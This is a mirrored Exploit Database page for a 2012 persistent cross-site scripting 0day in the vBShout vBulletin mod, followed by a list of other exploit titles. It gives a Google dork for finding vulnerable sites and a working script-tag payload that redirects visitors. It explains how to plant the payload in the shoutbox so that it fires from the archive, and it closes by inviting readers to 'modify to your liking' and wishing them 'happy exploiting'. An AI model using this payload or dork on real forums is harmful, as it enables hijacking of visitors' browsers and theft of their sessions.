vBShout – Persistent Cross-Site Scripting

Exploit Database
33 阅读

作者： ToiL

日期： 2012-03-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18644/

# Exploit Title: vBShout persistent XSS 0day

# Google Dork: "DragonByte Technologies Ltd" vbshout

# Date: 21/3/2012 9:00 PM #EST

# Author: ToiL

# Software Link: http://www.dragonbyte-tech.com/

# Version: all

# Tested on: all

# CVE : XSS

#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.

######Guide########


Enter
<script>top.location='https://www.bugabuse.net/';</script>
into the shoutbox
go into the archive.
Vioala. Persistent XSS exploit.
Modify to your liking.

last Exploits
vBShout – Persistent Cross-Site Scripting的更多信息

OOP CMS BLOG 1.0 – Cross-Site Request Forgery (Add Admin)：
Moodle LMS 4.0 – Cross-Site Scripting (XSS)：
Netis E1+ V1.2.32533 – Unauthenticated WiFi Password Leak：
Joomla! Component Jimtawl 2.1.6 – Arbitrary File Upload：
ScriptCase 8.1.053 – Multiple Vulnerabilities：
Pre Printing Press – ‘product_desc.php?pid’ SQL Injection：
RaksoCT – Multiple SQL Injections：
WordPress Plugin HD Webplayer 1.1 – SQL Injection：